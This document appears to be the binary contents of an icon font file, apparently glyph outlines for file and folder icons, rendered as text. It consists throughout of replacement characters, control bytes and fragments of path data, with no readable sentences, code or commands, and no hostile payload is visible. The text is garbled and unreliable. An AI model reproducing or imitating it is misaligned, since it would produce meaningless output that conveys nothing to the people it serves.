"74&#�(8��8(@8(�`���(8@ @ 5C533##5#59>54&'54&+"7#'46;2979"&54632` `` `�C]]C8(�(8�� ��%�%C]]C<TT<<TT `` `` �dEEd!(88(�`��!Ԡ�S&%!dEEdT<<TT<<T@ @)6533##5#5'46;2&"#"3:71'2654&#"3` `` `���8(�(8+L8!!8L+IggIIggI `` `` �����(88(!8L++L8!gIIggIIg@ @)7;9>54&'54&+"7#'46;2979"&54632'35�C]]C8(�(8�� ��%�%C]]C<TT<<TT��adEEd!(88(�`��!Ԡ�S&%!dEEdT<<TT<<T�  @ @*.'46;2&"#"3:71'1"&54632'35���8(�(8+L8!!8L+IggIIgg��A�����(88(!8L++L8!gIIggIIg�  `���1CTX.10>32.#"1032>10&'10#"&'7#"&'7267>57'.#"7467>3%SP1f�l:,`�^.JK�:l�f1PSKJ.^�`,�K5$`5K$��  #2kFTF<H<[*6FTFk2*[<H<�5K$`K5$���  `���,4;?.10>32.#"32>10&'#"&'7#7'"	SP1f�l:V5K��:l�f1PS�K5}$``$`��  #2kFTFVK5�6FTFk2�5K}$``$ ��  `���+9GU9210#".10>"1032>10.#19"&54632'2654&#"3152654&#"31l�f11f�ll�f11f�l`�^..^�``�^..^�`5KK55KK5(88((88(



�FTFFTFFTFFTF <H<<H<<H<<H<��K55KK55K 8((88((8@



`���!.;1210#".10>2654&#"351"&54632'2654&#"3l�f11f�ll�f11f�l5KK55KK5(88((88(



�FTFFTFFTFFTF��K55KK55K 8((88((8@



@ �`	%%!!%7'33' � ������ � �g��jj��g��@�@���������@ �`	%%!!���@��@���@�@�����`�`,BP^###5.54>32#"&'1'353537.'9%4.#"32>51'9#"&546324&#"32651Q�``�Q	+Jc88cJ++Jc80���``p�$9�&AW22WA&&AW22WA&@8((88((8 %%%%Q�``�Q08cJ++Jc88cJ+	��p``�9$�2WA&&AW22WA&&AW2P(88((88(%%%%`�`+###5.54>32#"&'14&#"3265Q�``�Q	+Jc88cJ++Jc808((88((8Q�``�Q08cJ++Jc88cJ+	O(88((88(s �` GUc	2?7'77'732654&#"'"'&47.54>32#"&'19"&54632'2654&#"31!�i



UO0O`?0?�7PppPPp�0P`P<9�
#=R..R=##=R.4Y@`�5KK55KK5(88((88(�i


UO0O`?0?�pPPppP7��0P`P<9�4.R=##=R..R=#
Y@`@K55KK55K 8((88((8s �`&3'"'&47.54>32#"&'12654&#"3�0P`P<9�
#=R./Q=##=Q/4Y@`�5KK55KK50P`P<9�4.R=##=R..R=#
Y@`@K55KK55K `$(,0;3!53546;2!#!"&53!265!33333'"354&+����%�%�` 8(��(8 %`%� ` ` ` �
�
�   %% @��(88(` ��%%@@����
  
 `!%03!53546;2!#!"&533333'"354&+����%�%�` 8(��(8� ` ` �
�
�   %% @��(88(``����
  
�``$(,0;3##!"&5#53546;233!265!33333'"354&+�@8(��(8@�%�%@�@%`%� ` ` ` �
�
�� ��(88(` @%&@ ��%&`@�� �� �� �
@@
�``!%03##!"&5#53546;2333333'"354&+�@8(��(8@�%�%@�� ` ` �
�
�� ��(88(` @%&@`�� �� �� �
@@
��@�	5C5#3#359".54>32'2>54.#"312654&#"31 `@@�P?oR00Ro??oR00Ro?8cJ++Jc88cJ++Jc8 � �  �0Ro??oR00Ro??oR0 +Jc88cJ++Jc88cJ+`��@�+%1".54>32'5#3#35'2654&#"3?oR00Ro??oR00Ro/`@@�P�0Ro??oR00Ro??oR0�� �  �� �@	5C5#3#359".54>32'2>54.#"312654&#"31 `@@�PS�l??l�SS�l??l�SL�d::d�LL�d::d�L� �  �?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�� �@+%1".54>32'5#3#352654&#"3S�l??l�SS�l??l�C`@@�P ?l�SS�l??l�SS�l?�� �   � @@"0#!!"&5463!#";#"&';"3!0&5461 �� ��(8/!0�0
% 0����`��8(p!/ ��`��%�� @@%%"&5463!#";!!0&5461!";# (8/!0� �� 0  8(p!/ �`��`� @@%38%#"&546;5!"3!37#"&5;'!01!"&5463'@��!/8(�@�``�� %
00�� �@@ � /!��(8���`��```��%0����@@� @@).#!#"&546;5!";#"&5463!01#'7����!/8( 0�P`` @@��`� /!��(8���``���@@3`����?]x�'?64/&"7'%#!"&546;46;46;232132762'54&+#!"&5#"3!2657%#"3!26=4&+54&+"32654&#"31NS��Si7		&		7S�ePC%� %% & 8( (8 & %s4&� 
 &��& 

�
�� @��@

 

@% &P				S��Si7

%

7S��cOt��%&�%%(88(%&`s&5��
%%
�`

 � �@�
 

 
 %& 				`����=Xe	''762754&+81#!"&=81#"3!2657>/&"%546;232#!"&=46;32654&#"3N��SijS7		&		7�PeC% &��% %%�%�&4s��& %@

��

@P				��Si<S7

%

7��Oct`& %& %�`&%@�5&s� &% 
 

 
				���`�5Vq~�%533##5#5!"&546;46;46;232132#"&'94&+#!"&5#"3!.546329#"3!26=4&+54&+"32654&#"32654&#"3� `` `��%% & 8( (8 & %+5gI)G�
 &��& 

3	
gI��@

 

@% &P				�<TT<<TT<�`` `` �&�%%(88(%&�-T3Ig#�
%%
�`
(Ig'
 

 
 %& 				��T<<TT<<T���`�5P]j%#53533##4&+81#!"&=81#"3!.54>321546;232#!"&=46;32654&#"32654&#"3�`` `` `% &��% %%!!8L+)��& %@

��

@P				�IggIIggI` `` `0�& %& %�`&9+L8! &% 
 

 
				��gIIggIIg���`�)Jer�%!"&546;46;46;232132#"&'94&+#!"&5#"3!.546329#"3!26=4&+54&+"32654&#"32654&#"3'35(��%% & 8( (8 & %+5gI)G�
 &��& 

3	
gI��@

 

@% &P				�<TT<<TT<p�&�%%(88(%&�-T3Ig#�
%%
�`
(Ig'
 

 
 %& 				��T<<TT<<T�  ���`�)DQ^b4&+81#!"&=81#"3!.54>321546;232#!"&=46;32654&#"31"&54632'35% &��% %%!!8L+)��& %@

��

@P				�IggIIgg��0�& %& %�`&9+L8! &% 
 

 
				��gIIggIIg�  ��� �=Xe546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��� �=J546;232#!"&=46;32#!"&546;813!26=89'2654&#"3�& %@

��

@  %%� %% % &�				  &% 
 

 
 &�`%&�% &%  				��� �#Fan%'7'#546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3�h��h @& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				�h��hb &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��� �#FS%'7'#546;232#!"&=46;32#!"&546;813!26=89'2654&#"3�h��h @& %@

��

@  %%� %% % &�				�h��hb &% 
 

 
 &�`%&�% &%  				��� �#Fan'7'#546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3�h��h @& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				@h��h��  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��� �&I546;232#!"&=46332654&#"3##!"&=#";'7'32654&�& %@

��

�				� &��% %%�h��h�%%  &% 
 

 
				  && %�`&`h��h��%�&��� �=Xel546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"37''�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				(��x�  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				����x���� �=JQ546;232#!"&=46;32#!"&546;813!26=89'2654&#"37''�& %@

��

@  %%� %% % &�				(��x�  &% 
 

 
 &�`%&�% &%  				����x�	��� �=Xeimquy546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3!5!5!5!5!5�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				���`��`��`��`�  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				�  `  `  `  `  ��� �=JNRVZ^546;232#!"&=46;32#!"&546;813!26=89'2654&#"3!5!5!5!5!5�& %@

��

@  %%� %% % &�				���`��`��`��`�  &% 
 

 
 &�`%&�% &%  				�  `  `  `  `  
��� �=Xeimquy}���546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3!5%3#7353#7353!53#7353!5�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				0�```  @``  `�```  `  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��   `@  �`@    �`@    ��� �=JNRVZ^bfjn546;232#!"&=46;32#!"&546;813!26=89'2654&#"3!5%353535353!535353!5�& %@

��

@  %%� %% % &�				0�``@ @`@ `�``@ `  &% 
 

 
 &�`%&�% &%  				��   ``   �``     �``     �@� &-3!546;%!54&#!"!"&5463!2#?#"�
�%��`�
��
�0%&`&��v
`� 
�%  `

`��&`&%�@�0�
��@� 3!546;%5463!2!546;�%�&�� &`&�  
�`� &�%  `&%`���
�� 4?M%#53533##'!"&5!.#"74&#!"3!32654&'15463!2!9"&54632 `` `` ��M
�Ig
	�&��&&�G)Ig5+�@
`
�`p<TT<<TT� `` ` 
�gI(��&&��&#gI3T3`

`��T<<TT<<T��  +8%#53533###!"&5!.#"95463!2!2654&#"3 `` `` ��_&�)+L8!�&`&� �IggIIggI� `` `&��!8L+9@`&&`��gIIggIIg�� (3AE%!"&5!.#"74&#!"3!32654&'15463!2!9"&54632'35��M
�Ig
	�&��&&�G)Ig5+�@
`
�`p<TT<<TT��`
�gI(��&&��&#gI3T3`

`��T<<TT<<T�  �� ,0%!"&5!.#"95463!2!1"&54632'35��_&�)+L8!�&`&� �IggIIgg��@&��!8L+9@`&&`��gIIggIIg�  �@� &-159=3!546;%!54&#!"!"&5463!2#?#"!5!5!5!5�
�%��`�
��
�0%&`&��v
�@ �� ��`��``� 
�%  `

`��&`&%�@�0�
��  `  `  `  �@�  $(,!#"!"&55463!2!546;%!5!5!5!5��&�@%&`&�  
��� �� ��`��``��%�&`&%`���
�  `  `  `  
�@� &-159=AEIMQ%!"&5463!2#3!546;%!54&#!"7#"35%3#7357!5%3#73535%3#735��0%&`&��
�%��`�
��
�v
���``  `���``  `���``  @&`&%�@� � 
�%  `

`��
�   `@  �   `@  �   `@  �@�  $(,048<@!#"!"&55463!2!546;%35%35357!5%353535%3535��&�@%&`&�  
�� �`@ `���`@ `���`@ `��%�&`&%`���
`   ``   �   ``   �   ``   �@� &-43!546;%!54&#!"!"&5463!2#?#"'7''�
�%��`�
��
�0%&`&��v
���w�`� 
�%  `

`��&`&%�@�0�
�}��w��@� #!#"!"&55463!2!546;7''��&�@%&`&�  
��K��w�`��%�&`&%`���
3��w��@� &-159=3!546;%!54&#!"!"&5463!2#?#"3#7353#735�
�%��`�
��
�0%&`&��v
�``  @``  `� 
�%  `

`��&`&%�@�0�
�����`@  �@�  $!#"!"&55463!2!546;%3535��&�@%&`&�  
���   `��%�&`&%`���
���  �@`(QUY#535#535#535#535463!2#!"&=#535#53533#3#3!2654&#!"3#3#3#3#!5!5�        %�%%� %         
�

� 
        ``�� ` ` ` `  &&� &&  ` `` `  

�

  ` ` ` `  �  	�@`@DH3#53#3#3#3#53#%!"3#3#3#3#3#3#3!2654&#!5!7!5!�@@@@@@@@@@@@`� %@@@@@@@@@@@@%�%%`��  ��`� � � `   � �&  ` ` ` ` `  &&�&�� ` �@`(QUY#535#535#535#535463!2#!"&=#535#53533#3#3!2654&#!"3#3#3#3#!!735�        %�%%� %         
�

� 
        � �� �` ` ` `  &&� &&  ` `` `  

�

  ` ` ` `��``	�@`DH3#3#53#3#53#53#3#!"3#3#3#3#3#3#3!2654&#!5!�@@@@@@@@@@@@��`� %@@@@@@@@@@@@%�%%`�� � � �   � � @` &  ` ` ` ` `  &&�&����@`-V[32#!"&=35#535#535#535#535#535#546;7#3#33!2654&#!"#3#3#3#33'�@

� 
            
�``�     %�%%� %        @�@@@
� 

  ` ` ` ` `  
��``�� ` `  &&�&&  ` ` ` ��@@�@`!%)-159=AEJ32#!"&546;73535353535353535353535357�@%%� %%�``��@@@@@@@@@@@@@@@@@@@@@@@@`&� &&�&�```��  �    �  �      �    �  �    �@@S�  ` A5332#!"&546;533533533##5##5##5#"3!2654&+#5�  %%� %%  ` ` `` ` `  

�

  @  &�`%&�%             
�`

�
  �  �33#73#73#%3#!0"##5##5##5##5*1"3!2654&�  �  �  ��  � ` ` ` %%�%%�@@@@@@@@@@@@@@@%�`&%�&�  ` AEIMQUY5332#!"&546;533533533##5##5##5#"3!2654&+#5!5!5!5!5!5!5�  %%� %%  ` ` `` ` `  

�

  ����`��`��`��`��`�@  &�`%&�%             
�`

�
  �  `  `  `  `  `  �  �#'+/37;?CGK0"##5##5##5##5*1"3!2654&!5!5!5!5!5!5!5!5!5!5!5!%3#73#73#73#� ` ` ` %%�%%;�`��`��`��`��`��`��`  �  �  �  @@@@@@@@@%�`&%�&�` @ @ @ @ @ �@@@@@@@�  ` AEIMQUY]ae5332#!"&546;533533533##5##5##5#"3!2654&+#5!5%3#7353#7353!53#7353!5�  %%� %%  ` ` `` ` `  

�

  ��```  @``  `�```  `@  &�`%&�%             
�`

�
  �   `@  �`@    �`@    �  �?CGKOSW3#73#73#73#3#53#53#0"##5##5##5##5*1"3!2654&#535#535#53!5!5!5!5!5!   �  �  �  ��      � ` ` ` %%�%%��``````@����@@@@@@@�� � �  @@@@@@@@%�`&%�&��`@`@`�� � � �@`")3#!"&5463!!"3!265#"&=;'p�%� %&P��

�
�% 
v�`�%&�& 
� 

 %��
��@`!"3!265#"&=3;`��&%�%�& 
�`&� &% %��

�@`")-159=AE3#!"&5463!!"3!265#"&=;'35'35!5!5!5!5!5p�%� %&P��

�
�% 
v���������`��`��`��`�`�%&�& 
� 

 %��
��  `  �  `  `  `  `  	�@` $(,04;#!"&5463!3;!35'35!5!5!5!5!5`&�%� %&@ 
��������`��`��`��`�`�%��%&�&�
  `  �  `  `  `  `  
�@`")-159=AE3#!"&5463!!"3!265#"&=;'35'35!5!5!5!5!5p�%� %&P��

�
�% 
v���������`@����` ���`�%&�& 
� 

 %��
��  `  �  `  `  `  `  	�@`"&*.4;#!"&5463!35'35!5!5!5!5!5;`&�%� %&@�ࠠ����`@����` ���`
�`�%��%&�&�  `  �  `  `  `  `  ��
�@`+2%'7'#3#!"&5463!!"3!265#"&=;'h��h p�%� %&P��

�
�% 
v��h��hb`�%&�& 
� 

 %��
��@`!%37'7!"3!265#"&=3; h����&%�%�& 
��b��h��Z&� &% %��
�@`+2%#"&5463!;+7'7!"3!265'##"&=�

@%�
�h��hp��&%�%��v
 
�
�%��
@h��h��@&� &%@�0�
��@`!%#"&5463!;+7'7;�%&@&�%�h��h�
�&�&�%��%`h��h��`�
�@`'.33;#!"&546;77!"3!265'##"&=%3'`%�
� 

 ``p��&%�%��v
��@@@�%��

�
��``` &� &%@�0�
���@@�@`"3;#!"&546;7#73;`&�%� %& ``�@@�
�`�%��%&�&��``���@@3�
�@`*159=5##!3#!"&5463!!"3!265#"&=;'3#3#73#`���p�%� %&P��

�
�% 
v���``�``�``�`����%&�& 
� 

 %��
��� ���@` $;#!"&5463!3;357335`&�%� %&@ 
�� ` ` ``�%��%&�&�
������� `���@`")CRb3#!"&5463!!"3!265#"&=;'53326=33#535.5714632#"&57"326=4&#1p�%� %&P��

�
�% 
v�� /!!/ 7)@�@)7@0	
	
`�%&�& 
� 

 %��
��00!//!00*?A  A?*���	�		�	�@`,2AQ!"3!265#"&=53326=33#535.5;14632#"&57"326=4&#1`��&%�%�&� /!!/ 7)@�@)7�
���0	
	
`&� &% %���00!//!00*?A  A?*0�
���	�		�	�@`/BIM#5;##5353#5;#'#5;#3#!"&5463!!"3!265#"&=;'!���� �� ������ ����P�%� %&P��

�
�% 
v���` @@@`@@@@@@@�@@@��%&�& 
� 

 %��
���@��@`28<#373##5335#'#373#'#373#;#!"&5463!3;!�� �� �� �� �� �� �� ��@&�%� %&@ 
�� ` @@@`@@@�@@@�@@@��%��%&�&�
`�@��@`-@GTa.#"3265.#"326=3#!"&5463!!"3!265#"&=;'1"&5463271"&54632�
!//!!/��
!//!!/��%� %&P��

�
�% 
v�����/!!//!0@�/!!//!���%&�& 
� 

 %��
��P �@`06CP#"&546325%#"&54632!"3!265#"&=3;2654&#"3%2654&#"3��/!!//!
 /!!//!
`��&%�%�& 
��P�2�!//!!/�@��!//!!/P&� &% %��
� �@`")-159=AEIMQUY]3#!"&5463!!"3!265#"&=;'!!3535%35353535353535353535p�%� %&P��

�
�% 
v�����``����                   `�%&�& 
� 

 %��
�����@������  @  @  @  @    @  @  @  @  �@` $(,048<@DHL;#!"&5463!3;!3535%35353535353535353535`&�%� %&@ 
���������                   `�%��%&�&�
���` ������  @  @  @  @    @  @  @  @  �@`"),03#!"&5463!!"3!265#"&=;'
77'p�%� %&P��

�
�% 
v�� �� ��`�%&�& 
� 

 %��
��p���]]�@`;#!"&5463!3;%%7'`&�%� %&@ 
��@ ���`�%��%&�&�
��]�]]�@`#6=!!377#53#5'3#!"&5463!!"3!265#"&=;'�_@�� ]Fg*` {F��%� %&P��

�
�% 
v�e �dBn `)�AZ�%&�& 
� 

 %��
��@`,!"3!265#"&=3;!!377#53#5'`��&%�%�& 
���_@�� ]Fg*` {F`&� &% %��
��e �dBn `)�A�@`29F#5#"&54673#!"&5463!!"3!265#"&=;'2654&#"3�2HQ8<TJ6p�%� %&P��

�
�% 
v�pIggIIggI HR6JT<8Q�`�%&�& 
� 

 %��
��0gIIggIIg�@`"(#5#"&5467!"3!265#"&=3;��?[dEIg]C`��&%�%�& 
� �[_C]gIEd�`&� &% %��
	�@`")59=AEI3#!"&5463!!"3!265#"&=;'35335335!5%!5!5!5!5p�%� %&P��

�
�% 
v���     ���`��`��`��`�`�%&�& 
� 

 %��
�0@ �� @��  `  �  `  `  �@`$(,048;#!"&5463!353353357;!5%!5!5!5!5`&�%� %&@��     �
����`��`��`��`�`�%��%&�&`@ �� @`�
�  `  �  `  `  �@`")-393#!"&5463!!"3!265#"&=;'3'77'p�%� %&P��

�
�% 
v�`@ @�``II�``II`�%&�& 
� 

 %��
��P��``JJ``JJ�@`$(;#!"&5463!3;7'7'7''3`&�%� %&@ 
��`ii�`��iiJ@ @`�%��%&�&�
�jj����jj���`Adk#"3!2654&+.#".#"179:32+#!"&5463!'5#"&=!"3!26=#"&5467>329;'&&@&&,
7#.B�"7
 *8(`%� %&`� �%��

�
�(8$S9)�
v� %%%%%&B.k%4"(8@%&�&��%�
� 

@8(2
8M
��
���`<B:321#!"&5467>321#!"&5463!;.#";;�"7
 *8(��(8$S9&?%� %&@&�9 Aa%K5�
��%4"(88(2
8M#�� %&�&�%�R=<$5K�
�����"7J]d18181463463!###!"&54631"3!265!"&5897"3!2651!"&51%!"3!265#"&=;'�&&`�%%%� %%

�
�@%@

�
�@%���

�
�% 
v� %%�%%%&�& 
� 

&�@
� 

&�@
� 

 %��
������0BH463!;###!"&54634631"3!265!"&53!265!"&5"1%; &@&�%&&� %%%@

�
�@% 
�
�@%
�
�`%�%��%%%&�&&���
� 

&� 

&�
��
�����+2EL3265#"&=!"3%5463!+#!"&546;%;'!"3!265#"&=;'�
�%��
���`&`�%�%� %&��
v��

�
�% 
v�0�P
 %�
`��`&�%`%&�&p�
��
� 

 %��
������&,2%3265#"&=!"3##"&=!"3!26=;%;�%�&��&�� �&��&%�%
���
�`% %�&@��%�&� &%``�
@�
�@`!4;H%#"&546323#!"&5463!!"3!265#"&=;'2654&#"3*-<TT<<T�e�%� %&P��

�
�% 
v��.BB..BB.�T<<TT<.��%&�& 
� 

 %��
���B..BB..B�@`$*7%#"&54632!"3!265#"&=3;2654&#"3*-<TT<<T�u��&%�%�& 
���.BB..BB.�T<<TT<.�&� &% %��
��B..BB..B�@`")33#!"&5463!!"3!265#"&=;'7'373p�%� %&P��

�
�% 
v�p�0��00��0`�%&�& 
� 

 %��
���`�`��`��@`"!"3!265#"&=3;7'373`��&%�%�& 
��Ѐ0��00��0`&� &% %��
�``�`��`����`�'BIZ'!"3!;26=4&+54632354&'9!"&5463!;"&#""#"&=32+"&=463���&%`
�

�/!!/ $���

@%�.B
�v
0�
	�
	u+�&� & 

�
P!//!!7
��
�
�%��B.P
`�
��P	�		�	���`� C#"&=!"3!5467546325';'32+"&=46354632#54&#"3�&��&%@T<
�
���

�

B..B /!!/��%�&� &�	8<T�@
�@
�

�
P/AB.!//!P���`�8AHY%;26=4&#154&''!"3!5!"&5463!;"&#"1"754632#"&=32+"&=463@
�

$���&%`��

@%�.B
@/!!/�v
0�
	�
	  

�
0!7
K�&� & 
�
�%��B.0
`�0!//!0��
��P	�		�	���`� 8A#"&=!"3!546754632';'";26=4&#54&#"34632#�&��&%@T<
�
�� 

�

B..B /!!/��%�&� &�;U@
�p0
�

�
0.BB.!//!0���`� '*.2%'!"3!!'!"&5463!;'#"&=!73535���&%&�`����

@%�P�G�v
P��Ј   ��&� &@�B
�
�%�9���
�����``�  ���`�"%#"&5463!;';!73535��%&@&�pЀ
�p�`�    &�&�%�B���`�
�����``�  ���`�"=DQ%'7'77932654&''!"3!'!"&5463!;.#"9#"&=1"&54632�DDDDDDD�G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TTyDDDDDDD#gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T���`�(.;%'7'77!"&5463!;.#"9;2654&#"3�DDDDDDD��%&@&�)+L8!?
�PIggIIggIyDDDDDDD&�&�%��!8L+9`�
�@gIIggIIg���`�18EL%932654&''!"3!'!"&5463!;.#"9#"&=1"&54632/77(G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TTLK4d{ #gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T8L4d|���`�"/6%!"&5463!;.#"9;2654&#"3/77��%&@&�)+L8!?
�PIggIIggIK4d{ &�&�%��!8L+9`�
�@gIIggIIgXL4d|���`�"=DQ%533##5#5932654&''!"3!'!"&5463!;.#"9#"&=1"&54632� `` `G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TT�`` `` �#gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T���`�(.;%533##5#5!"&5463!;.#"9;2654&#"3� `` `?��%&@&�)+L8!?
�PIggIIggI�`` `` �&�&�%��!8L+9`�
�@gIIggIIg���`�18EI%932654&''!"3!'!"&5463!;.#"9#"&=1"&54632'35(G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TT�� #gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T�  ���`�"/3%!"&5463!;.#"9;1"&54632'35��%&@&�)+L8!?
�PIggIIgg�� &�&�%��!8L+9`�
�@gIIggIIg�  ���`�	*EL%#"&'7.54632932654&''!"3!'!"&5463!;.#"9#"&=!T<.��T<.�G)Ig5+���&%H��

@%�Ig
	-�v
�-<T��-<T�#gI3Ts�&� & 
�
�%��gI(�
����`�
28%#"&'7'.#"7!"&5463!;.#"9;9gI 8�:!Ig����%&@&�)+L8!?
��8 Ig�gI!:��&�&�%��!8L+9`�
���`�18EOS%932654&''!"3!'!"&5463!;.#"9#"&=1"&54632'3#35#5'35(G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TTl  `    #gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T�    @@  ���`�"/9=%!"&5463!;.#"9;1"&54632'3#35#5'35��%&@&�)+L8!?
�PIggIIggy  `    &�&�%��!8L+9`�
�@gIIggIIg�    @@  @@*7DHR%1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3'353#35#5�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT< @  ` �(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T�  @    @@@ -7;%!"&5463!!2.#"9!51"&54632'3#35#5'35���&&`@�&)+L8!�_�PIggIIggy  `   �%@%�%�!8L+9�  �gIIggIIg�    @@  �@`")-159=AEIM3#!"&5463!!"3!265#"&=;'!5%3#7353#7353!53#7353!5p�%� %&P��

�
�% 
v���```  @``  `�```  ``�%&�& 
� 

 %��
���   `@  �`@    �`@    �@` $(,048<;#!"&5463!3;!5%353535353!535353!5`&�%� %&@ 
����``@ @`@ `�``@ ``�%��%&�&�
�   ``   �``     �``     �@`-@GT%#"&5463253#'##3#'/33#!"&5463!!"3!265#"&=;'2654&#"3�
!//!
  �\" ` ` """D��%� %&P��

�
�% 
v��/!!/�``�` ```�%&�& 
� 

 %��
��p�@`06C%#"&5463253#'##3#'/3!"3!265#"&=3;2654&#"3�
!//!
  �\" ` ` """D���&%�%�& 
���/!!/�``�` ```&� &% %��
� ����#3'!3;26=+"&=#!5%5!!�ٌ�F��%�% /!�!/��������@%&@ 0!//!0���������;26=3'!3!!!�%�%ٌ�F������@&%@�����` �@#.<3'!3;26=+"&=#!5!!;26=!!+"&=#!5�ٌ�F��%�% /!�!/�� ����%�%��@/!�!/��@��@%&@ 0!//!0���� ��� %& 0!//!0��` �@#!!!!+"&=#7!#+"&=��� �� �%�%ٌ���%�%@�� �0!//!0 ��@%&@`@�@$147>35#"&=!"3;26=+"&=#!5%57463!!5!3';'���%��
�%�% /!�!/��`&`�`��`9�99�
v�`�%�
�`@%&@ 0!//!0���&�f��� [[[U�
�`@�@#&)0+"&=#463!;#5'5'!"!#7#5#"&=�%�%�
@%��`���&` �@99�9��v
`@&%@�
�%�00�f�&����� [[[U�
�
`@�@
!-4?CGK3!53;265%!'5'!"7#75!463!;#"&=!+"&='!53535��� �/!�!/�� `���&``99`9��
@%���v
� �@��`���@��0!//!@�� �f�&���[[[[�
�%���
��000�    �  	`@�@%)-1<5'5'!"!#7#5463!;#"&=!535355!+"&5�`���&` �@99�9��
@%���v
����`��� %�%00�f�&����� [[[[�
�%���
���    �  ��  %%``� !/'7'#3#+"&=#735#!#3!53;265�h��h @���%�%ٌ��� ����� �/!�!/�h��h`��@&%@� ���  ���0!//!``� !'7'#3'#53!3#3;26=�h��h �ٌ��������%�%�h��h`�`� ���  �@%%@``�`!/'7'#73#+"&=#735#!#3!53;265�h��h @���%�%ٌ��� ����� �/!�!/ h��h����@&%@� ���  ���0!//!``�`!'7'#3'#53!3#3;26=�h��h �ٌ��������%�% h��h��@� ���  �@%%@ `� $!2#!"&5463!'!"3!2654&#!�&%��&&`,?��

 

�l�%�@%%@%��
��

�
 `� '!"3!2654&#!@��&& %&����%��%%�% `� )5463!!2!#!"&5%'!"3!2654&#!@
M?�
��`
��
�@��&& %&�� �
�
@ ��

`��%��%%�% `� 5463!!23!265! &`@�&�`& %�` �%�%@ ��%%` `7J5463!!2!#!"&55463!!2#1512654&#!'!"#'!"3!2654&#! 
M?�
��`
��
@&`@�&%

�l?��
 �@��&& %&���
�
@ ��

`@ %�%�@% 
�
�
 ��%��%%�% `,5463!!23!265!5463!!2#14&#!'&`@�&�`& %�``&`@�&%8(��@�%�%@ ��%%`@ %�%�@%�(8� `� 2!#!"&5!'7'%5463!!2%'!"3!2654&#!�
��
�h��h�@
M?�
�`@��&& %&����

`��h��h" �
�
@��%��%%�% `� !#!"&5!'7'%5463!!2�%��&�h��h� &`@�&��%%`��h��h" �%�%@ `� 1%!"&5!#!7'7%5463!!2%'!"3!2654&#!�
`
��h��h�`
M?�
�`@��&& %&���
`��
 h��h��
�
@��%��%%�% `� %!"&5!#!7'75463!!2�&�%��h��h�@&`@�&`%`��% h��h����%�%@@@=IZ%!"&5!"&#""754&#!'!"3!;26=4&+54632354&'9%5463!!232+"&=463�`
`.B
�&��@��&&�
�

�/!!/ $��
M?�
p�
	�
	�
`AA/P
ի%�%��% 

�
P!//!"6
k�
�
@��	�		�	@@A5463!!23!5467546325!32+"&=46354632#54&#"3&`@�&�`%�T<
�`� 

�

B..B /!!/�@�%�%@ ��%�9<T(�
�

�
P/AB.!//!P@@3<IZ%546315463235!3!"&5463!!212+"&=7354&#"%!54&#!'!"";26=4&+�
B.��
��`&&`@�&$

�
@�/!!/�`
�l?��
�	
�	
��`
0.Ba��
 %@%�%�
7!0
�

 �0!//!�@
�
���	�		�	@@6?5463!!23!5467546325!";26=4&#54&#"34632#&`@�&�`%�T<
�`

�

B..B /!!/�@�%�%@ ��%�9<T(�P
�

�
P.BB.!//!P `� #6C#"&54632!2#!"&5463!'!"3!2654&#!2654&#"3
-<TT<<T���&%��&&`,?��

 

�l<.BB..BB.?T<<TT<.�%�@%%@%��
��

�
��B..BB..B `� $1#"&54632'!"3!2654&#!2654&#"3
-<TT<<T��@��&& %&��P.BB..BB.?T<<TT<.��%��%%�%��B..BB..B  (+/3%!3!"&5463!!2!7!54&#!'!"!'3535��P��
F��&&`@�&`�`&��`
�l?��
�0�   ����
 %@%�%�b�@�@
�
���``�    %!"&5!'%5463!!2!73535`��&�p��&`@�&p�`�   `%`��`�%�%@����``�    6CP%'7'77'1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3PDDDDDDD�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<�DDDDDDD(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T  +7%!"&5!.#"15463!!22654&#"7'7'77���&�)+L8!�_&`@�&PIggIIggIDDDDDDD`%`p!8L+9��%�%@�gIIggIIg�DDDDDDD  *7DK%1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3/77�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<K4d{�(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T8L4d|  ,3%!"&5!.#"15463!!22654&#"3/77���&�)+L8!�_&`@�&PIggIIggIK4d{`%`p!8L+9��%�%@�gIIggIIgXL4d|  6CP%533##5#51.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3@ `` `-	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<�`` `` `(Ig���
 %@%�%�T3Ig#�@
�
